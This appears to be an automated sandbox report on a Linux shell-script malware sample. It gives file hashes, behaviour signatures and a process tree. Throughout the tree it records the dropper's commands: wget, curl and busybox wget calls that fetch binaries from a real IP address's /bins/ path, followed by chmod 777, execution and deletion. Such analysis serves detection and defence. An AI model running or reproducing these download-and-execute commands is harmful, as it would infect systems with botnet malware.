Analysis
-
max time kernel
35s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
-
Size
10KB
-
MD5
eeab4766daa60dbedfe5ac8ed6379d9b
-
SHA1
9bc333ca6165533554a6ae360550dd5b28050e51
-
SHA256
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad
-
SHA512
9e67b335a4b29e5381bbba0e4b024f17164814614713df6763b598063707277000f155eb47bcdd5ce7c785eaf790fffe084134540be358aa1bea4ce7fadc518c
-
SSDEEP
192:N5pZuLnRjPMfpMnOWrt609vuOZKu6j6MOWrt609uOZKuiJpZuLnIbjPMF:NkjPMfpMnOWrw09vuOZKu6j6MOWrw09z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1603 chmod 1635 chmod 1513 chmod 1555 chmod 1567 chmod 1659 chmod 1549 chmod 1591 chmod 1621 chmod 1665 chmod 1537 chmod 1579 chmod 1597 chmod 1609 chmod 1653 chmod 1525 chmod 1543 chmod 1573 chmod 1641 chmod 1507 chmod 1519 chmod 1531 chmod 1585 chmod 1647 chmod 1561 chmod 1615 chmod 1629 chmod 1671 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 1508 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 /tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 1514 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 /tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ 1520 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ /tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR 1526 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR /tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD 1532 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD /tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr 1538 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr /tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD 1544 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD /tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a 1550 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a /tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP 1556 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP /tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY 1562 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY /tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT 1568 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT /tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel 1574 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel /tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 1580 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 /tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu 1586 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu /tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP 1592 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP /tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr 1598 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr /tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD 1604 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD /tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a 1610 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a /tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu 1616 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu /tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY 1622 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY /tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT 1630 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT /tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel 1636 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel /tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 1642 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 /tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 1648 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 /tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 1654 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 /tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD 1660 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD /tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ 1666 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ /tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR 1672 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a curl File opened for modification /tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 curl File opened for modification /tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD curl File opened for modification /tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a curl File opened for modification /tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 curl File opened for modification /tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP curl File opened for modification /tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu curl File opened for modification /tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1 curl File opened for modification /tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY curl File opened for modification /tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT curl File opened for modification /tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 curl File opened for modification /tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR curl File opened for modification /tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD curl File opened for modification /tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT curl File opened for modification /tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel curl File opened for modification /tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD curl File opened for modification /tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD curl File opened for modification /tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ curl File opened for modification /tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY curl File opened for modification /tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr curl File opened for modification /tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75 curl File opened for modification /tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ curl File opened for modification /tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR curl File opened for modification /tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2 curl File opened for modification /tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr curl File opened for modification /tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu curl File opened for modification /tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP curl File opened for modification /tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel curl
Processes
-
/tmp/c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh/tmp/c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh1⤵PID:1498
-
/bin/rm/bin/rm bins.sh2⤵PID:1499
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1500
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Writes file to tmp directory
PID:1504
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1506
-
-
/bin/chmodchmod 777 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75./asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Executes dropped EXE
PID:1508
-
-
/bin/rmrm asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1509
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1510
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1512
-
-
/bin/chmodchmod 777 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2./6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Executes dropped EXE
PID:1514
-
-
/bin/rmrm 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1518
-
-
/bin/chmodchmod 777 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ./c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1524
-
-
/bin/chmodchmod 777 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR./dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1530
-
-
/bin/chmodchmod 777 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD./CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1536
-
-
/bin/chmodchmod 777 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr./Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1542
-
-
/bin/chmodchmod 777 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD./FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1548
-
-
/bin/chmodchmod 777 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a./lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1554
-
-
/bin/chmodchmod 777 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP./C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1560
-
-
/bin/chmodchmod 777 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY./HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1566
-
-
/bin/chmodchmod 777 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT./Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Executes dropped EXE
PID:1568
-
-
/bin/rmrm Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1569
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1572
-
-
/bin/chmodchmod 777 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel./MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1578
-
-
/bin/chmodchmod 777 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1./37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1584
-
-
/bin/chmodchmod 777 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu./opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1590
-
-
/bin/chmodchmod 777 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP./C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1596
-
-
/bin/chmodchmod 777 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr./Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1602
-
-
/bin/chmodchmod 777 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD./FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Executes dropped EXE
PID:1604
-
-
/bin/rmrm FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1605
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1608
-
-
/bin/chmodchmod 777 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a./lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1614
-
-
/bin/chmodchmod 777 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu./opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1620
-
-
/bin/chmodchmod 777 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY./HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1628
-
-
/bin/chmodchmod 777 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT./Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Executes dropped EXE
PID:1630
-
-
/bin/rmrm Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1631
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1632
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Writes file to tmp directory
PID:1633
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1634
-
-
/bin/chmodchmod 777 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- File and Directory Permissions Modification
PID:1635
-
-
/tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel./MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Executes dropped EXE
PID:1636
-
-
/bin/rmrm MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1637
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1638
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Writes file to tmp directory
PID:1639
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1640
-
-
/bin/chmodchmod 777 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- File and Directory Permissions Modification
PID:1641
-
-
